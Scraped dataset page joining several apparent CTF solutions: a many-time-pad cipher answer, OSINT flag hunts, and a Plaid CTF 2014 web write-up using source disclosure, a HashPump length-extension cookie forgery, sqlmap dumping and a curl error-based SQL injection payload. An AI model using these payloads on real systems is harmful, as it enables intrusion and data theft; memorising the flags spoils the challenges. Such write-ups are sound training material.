First Many Time Pad then Caesar cipherFor checking your solutions:Keystream8cbceac3c9359047eafb6eca7503e26bd603a435c762f975ce3be5ba678c58ed<span>2fb4f9ff61ec46537c71f13046df1180a784d005d358f69fa9842443df1c4c4173d175973c5d07970a1ead0c6de587c38b5be127775bfa2f4c4cb42652975829fb499973256cfa29937458514cf2f553d7b947b9f15d28299968b863d239cffd673ef8839e59c6e41d05ad802cc927a42fad06ca2c88fa2c44604ee34ee01766e46874cf1b095406ecfb2feacb1de1e6cb8200cd64f875552e589fe6bdaeacabde3adee77fb7fec264631471ec316586ecdc2da5364ff659f8c76dddb099a42dec9c5b39805ac9b4c432d71ac93a6d09c3f2e5a00d484d2260c82357617cf62ee662f424400bf2fbe7c0b4358b3ceeb40422f331cc3a70dd86daec0042e713947f203c7b4a5c4753991576388d79498bd8c71b3ff0127444179d0a849f8b99434201bf8a827d2e18c5c1327e7ad0bd6e66678da10b572fff5e094551143cb2b0dd95f4ad035617a2adc79890a51a19dd0d6eac6d54220f176255b208f5c55b03532ab1f431d58f2963c36bc45026774c0abb7604aa03b8865f95c14aac7bfc23<span>cdae17a5d6424ccede669f3a474b7a</span></span>Caesar shift: rot-3"By the way, your flag is {Caesar_does_not_strengthen_many_times_pad}."
<span>Google "Elton Badget", first result is LinkedIn: http://ru.linkedin.com/pub/elton-badget/93/aa/42Read the initials of his "also knows about" section: Firewalls, Logistics Management, Apache, Graphic Design, IT Management, Servers, Database Design, IT Outsourcing, Computer Security, Technical Writing, ISO, 0-in, Network Security, Analytics, Risk Assessment, Yoga "FLAGISDICTI0NARY"</span>
First visit his Facebook page, he has this comment: "<span>Do u know about twitch.tv? Sometimes streaming there, look at me!"The about page writes: "</span>Screen Name: pipissimo (Other Service)"So you can find his twitch profile: http://www.twitch.tv/pipissimoIn one of his previous videos (the only one with a comment): http://www.twitch.tv/pipissimo/b/514722428 at 22:41 you can see that he shows a paper with the following text: "EVERYBODY HATES MY GUITAR SOUND" and this was the flag.
Question: Hack the Planet_The answer to this is “!”. It is based off of a running gag from DEFCON where eachyear they use the same question, but blank out a different character/word. If you didn't know this you could just google the phrase "Hack the Planet".
# Plaid CTF 2014: mtpox **Category:** Web**Points:** 150**Description:** > The Plague has traveled back in time to create a cryptocurrency before Satoshi does in an attempt to quickly gain the resources required for his empire. As you step out of your time machine, you learn [his exchange](http://54.211.6.40/) has stopped trades, due to some sort of bug. However, if you could break into the database and show a different story of where the coins went, we might be able to stop The Plague.>> Hint: try reading things using `?page=`. ## Write-up ### Source code disclosure vulnerability The “Index” link on the website points to [`/index.php?page=index`](http://54.211.6.40/). Playing around with that URL query string parameter reveals that the site is vulnerable to source code disclosure. We exploit this vulnerability to get the source code for [`index.php`](index.php) (via [`/index.php?page=index.php`](http://54.211.6.40/index.php?page=index.php)) and [`admin.php`](admin.php) (via [`/index.php?page=admin.php`](http://54.211.6.40/index.php?page=admin.php)). ### Hash length extension vulnerability Reading through the source code, we learn that [`admin.php`](admin.php) has some authentication logic: ```php$auth = false;if (isset($_COOKIE["auth"])) { $auth = unserialize($_COOKIE["auth"]); $hsh = $_COOKIE["hsh"]; if ($hsh !== hash("sha256", $SECRET . strrev($_COOKIE["auth"]))) { $auth = false; }}else { $auth = false; $s = serialize($auth); setcookie("auth", $s); setcookie("hsh", hash("sha256", $SECRET . strrev($s)));}``` Let’s focus on the `else` clause for now, i.e. the code that is executed the first time you visit the site (without a cookie): ```php$auth = false;$s = serialize($auth);setcookie("auth", $s);setcookie("hsh", hash("sha256", $SECRET . strrev($s)));``` So, the value of the `auth` cookie is `serialize(false)`, and the value of the `hsh` cookie acts as a signature for it. The cookie values for any logged out users are: ```auth=b%3A0%3Bhsh=ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3``` The value for `auth` makes sense, because in PHP, `false` serializes to `'b:0;`, and `true` serializes to `b:1;`: ```bash$ php -r 'echo serialize(false);'b:0; $ php -r 'echo serialize(true);'b:1;``` We cannot simply change the value of the `auth` cookie from `b:0;` to `b:1;` to gain administrator rights, because the `hsh` cookie is used as a signature check. If the signature in `hsh` doesn’t match the `auth` value, we’re still not logged in. After reading the source code more closely, we learn that the site is vulnerable to [hash length extension attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks). Here’s the vulnerable code in [`admin.php`](admin.php): ```phpif ($hsh !== hash("sha256", $SECRET . strrev($_COOKIE["auth"]))) { $auth = false;}``` In general, an application is susceptible to a hash length extension attack if it prepends a secret value to a string, hashes it with a vulnerable algorithm, and entrusts the attacker with both the string and the hash, but not the secret. Then, the server relies on the secret to decide whether or not the data returned later is the same as the original data. Since `$_COOKIE["auth"]` and thus `strrev($_COOKIE["auth"])` are values under our control, we can use a hash length extension attack to append data to `strrev($_COOKIE["auth"])` so that `$SECRET . strrev($_COOKIE["auth"]))` generates a new hash that still matches the unknown prefix `$SECRET`. That hash can then be used as the value for the `hsh` cookie. So, starting with the existing value for `strrev($_COOKIE["auth"])` (for which we know the signature hash), i.e. `;0:b`, what data should we append? We want to make it so that the value of the cookie is interpreted as `b:1;`, which reverses into `;1:b`. Let’s use [HashPump](https://github.com/bwall/HashPump) to calculate the new signature. [The about page](http://54.211.6.40/index.php?page=about.php) reveals that `length($secret)` is `8`, but if we didn’t know that, we could still ‘bruteforce’ it by trying all key lengths from `1` to `32`. ```bash$ hashpump --keylength 8 --signature 'ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3' --data ';0:b' --additional ';1:b'967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1;0:b\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`;1:b``` Now we have a new signature hash (`967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1`) to be used as the value for the `hsh` cookie, and the new value on which the hash is based (i.e. `strrev($_COOKIE["auth"]`) along with the `$SECRET` prefix. In order to get the `auth` cookie value, we still need to reverse and URL-encode this result: ```bash$ node> var data = ';0:b\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`;1:b';> console.log(encodeURIComponent(data.split('').reverse().join('')));b%3A1%3B%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%C2%80b%3A0%3B``` Just to be sure, let’s verify that this value `unserialize`s to `true` instead of `false`: ```bash$ php -r 'var_dump(unserialize(strrev(";0:b\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`;1:b")));'bool(true)``` Looking good. Now, let’s use these cookie values and reload `admin.php`: ```auth=b%3a1%3b%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3a0%3bhsh=967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1``` And we’re successfully logged in! ### SQL injection vulnerability The `query` URL parameter for [`/admin.php`](http://54.211.6.40/admin.php?query=lol) is vulnerable to SQL injection. Let’s see what kind of data we can leak using [`sqlmap`](http://sqlmap.org/): ```bash$ sqlmap.py -u 'http://54.211.6.40/admin.php?query=abc' --cookie='auth=b%3a1%3b%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3a0%3b; hsh=967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1' --dump-all sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13:33:37 [13:33:37] [INFO] using '/usr/local/Cellar/sqlmap/0.9/output/54.211.6.40/session' as session file[13:33:37] [INFO] testing connection to the target url[13:33:37] [INFO] testing if the url is stable, wait a few seconds[13:33:37] [INFO] url is stable[13:33:37] [INFO] testing if GET parameter 'query' is dynamic[13:33:37] [INFO] confirming that GET parameter 'query' is dynamic[13:33:37] [INFO] GET parameter 'query' is dynamic[13:33:37] [INFO] heuristic test shows that GET parameter 'query' might be injectable (possible DBMS: MySQL)[13:33:37] [INFO] testing sql injection on GET parameter 'query'[13:33:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[13:33:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[13:33:37] [INFO] GET parameter 'query' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[13:33:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'[13:33:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[13:33:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[13:33:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'GET parameter 'query' is vulnerable. Do you want to keep testing the others? [y/N] ysqlmap identified the following injection points with a total of 33 HTTP(s) requests:---Place: GETParameter: query Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: query=abc AND (SELECT 1000 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,119,100,58),(SELECT (CASE WHEN (1000=1000) THEN 1 ELSE 0 END)),CHAR(58,108,110,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--- [13:33:37] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debian or Ubuntuweb application technology: Apache 2.2.22, PHP 5.4.4back-end DBMS: MySQL 5.0[13:33:37] [INFO] sqlmap will dump entries of all databases' tables now[13:33:37] [INFO] fetching tables[13:33:37] [INFO] fetching database names[13:33:37] [INFO] the SQL query used returns 2 entries[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: mtpox[13:33:37] [INFO] the SQL query used returns 41 entries[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: CHARACTER_SETS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: COLLATIONS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: COLUMNS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: COLUMN_PRIVILEGES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: ENGINES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: EVENTS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: FILES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: GLOBAL_STATUS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: GLOBAL_VARIABLES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: KEY_COLUMN_USAGE[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: PARAMETERS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: PARTITIONS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: PLUGINS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: PROCESSLIST[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: PROFILING[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: REFERENTIAL_CONSTRAINTS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: ROUTINES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: SCHEMATA[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: SCHEMA_PRIVILEGES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: SESSION_STATUS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: SESSION_VARIABLES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: STATISTICS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: TABLES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: TABLESPACES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: TABLE_CONSTRAINTS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: TABLE_PRIVILEGES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: TRIGGERS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: USER_PRIVILEGES[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: VIEWS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_BUFFER_PAGE[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_TRX[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_BUFFER_POOL_STATS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_LOCK_WAITS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_CMPMEM[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_CMP[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_LOCKS[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_CMPMEM_RESET[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_CMP_RESET[13:33:37] [INFO] retrieved: information_schema[13:33:37] [INFO] retrieved: INNODB_BUFFER_PAGE_LRU[13:33:37] [INFO] retrieved: mtpox[13:33:37] [INFO] retrieved: plaidcoin_wallets[13:33:37] [INFO] fetching columns for table 'plaidcoin_wallets' on database 'mtpox'[13:33:37] [INFO] the SQL query used returns 2 entries[13:33:37] [INFO] retrieved: id[13:33:37] [INFO] retrieved: varchar(40)[13:33:37] [INFO] retrieved: amount[13:33:37] [INFO] retrieved: int(30)[13:33:37] [INFO] fetching entries for table 'plaidcoin_wallets' on database 'mtpox'[13:33:37] [INFO] the SQL query used returns 1 entries[13:33:37] [INFO] retrieved: 1333337[13:33:37] [INFO] retrieved: flag{phpPhPphpPPPphpcoin}Database: mtpoxTable: plaidcoin_wallets[1 entry]+---------+---------------------------+| amount | id |+---------+---------------------------+| 1333337 | flag{phpPhPphpPPPphpcoin} |+---------+---------------------------+ [13:33:37] [INFO] Table 'mtpox.plaidcoin_wallets' dumped to CSV file '/usr/local/Cellar/sqlmap/0.9/output/54.211.6.40/dump/mtpox/plaidcoin_wallets.csv'[13:33:37] [INFO] fetching columns for table 'CHARACTER_SETS' on database 'information_schema'[13:33:37] [INFO] the SQL query used returns 4 entries[13:33:37] [INFO] retrieved: CHARACTER_SET_NAME…``` The flag is `flag{phpPhPphpPPPphpcoin}`. For the record, the payload `sqlmap` used to get the flag was: ```bash$ curl --cookie 'auth=b%3a1%3b%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3a0%3b; hsh=967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1' 'http://54.211.6.40/admin.php?query=abc%20AND%20%28SELECT%203497%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C103%2C99%2C121%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28id%20AS%20CHAR%29%2CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20mtpox.plaidcoin_wallets%20LIMIT%200%2C1%29%2CCHAR%2858%2C118%2C117%2C112%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29'Query failed: Duplicate entry ':gcy:flag{phpPhPphpPPPphpcoin}:vup:1' for key 'group_key'``` ## Other write-ups and resources * <http://conceptofproof.wordpress.com/2014/04/13/plaidctf-2014-web-150-mtgox-writeup/>* <https://blog.skullsecurity.org/2014/plaidctf-web-150-mtpox-hash-extension-attack>* <http://achatz.me/plaid-ctf-mt-pox/>* [Source code for this challenge, released after the CTF](https://github.com/pwning/plaidctf2014/tree/master/web/mtpox)* <https://github.com/hackerclub/writeups/blob/master/plaidctf-2014/mtpox/WRITEUP-arthurdent.md>* [Indonese](http://blog.rentjong.net/2014/04/plaidctf2014-write-up-mtpox-web150.html)* [Russian](http://blog.nostr.ru/2014/04/mtpox-web-150-pts-plague-has-traveled.html)* <https://systemoverlord.com/blog/2014/04/14/plaidctf-mtpox/>
README.md exists but content is empty. Use the Edit dataset card button to edit it.
Downloads last month
5,899
Edit dataset card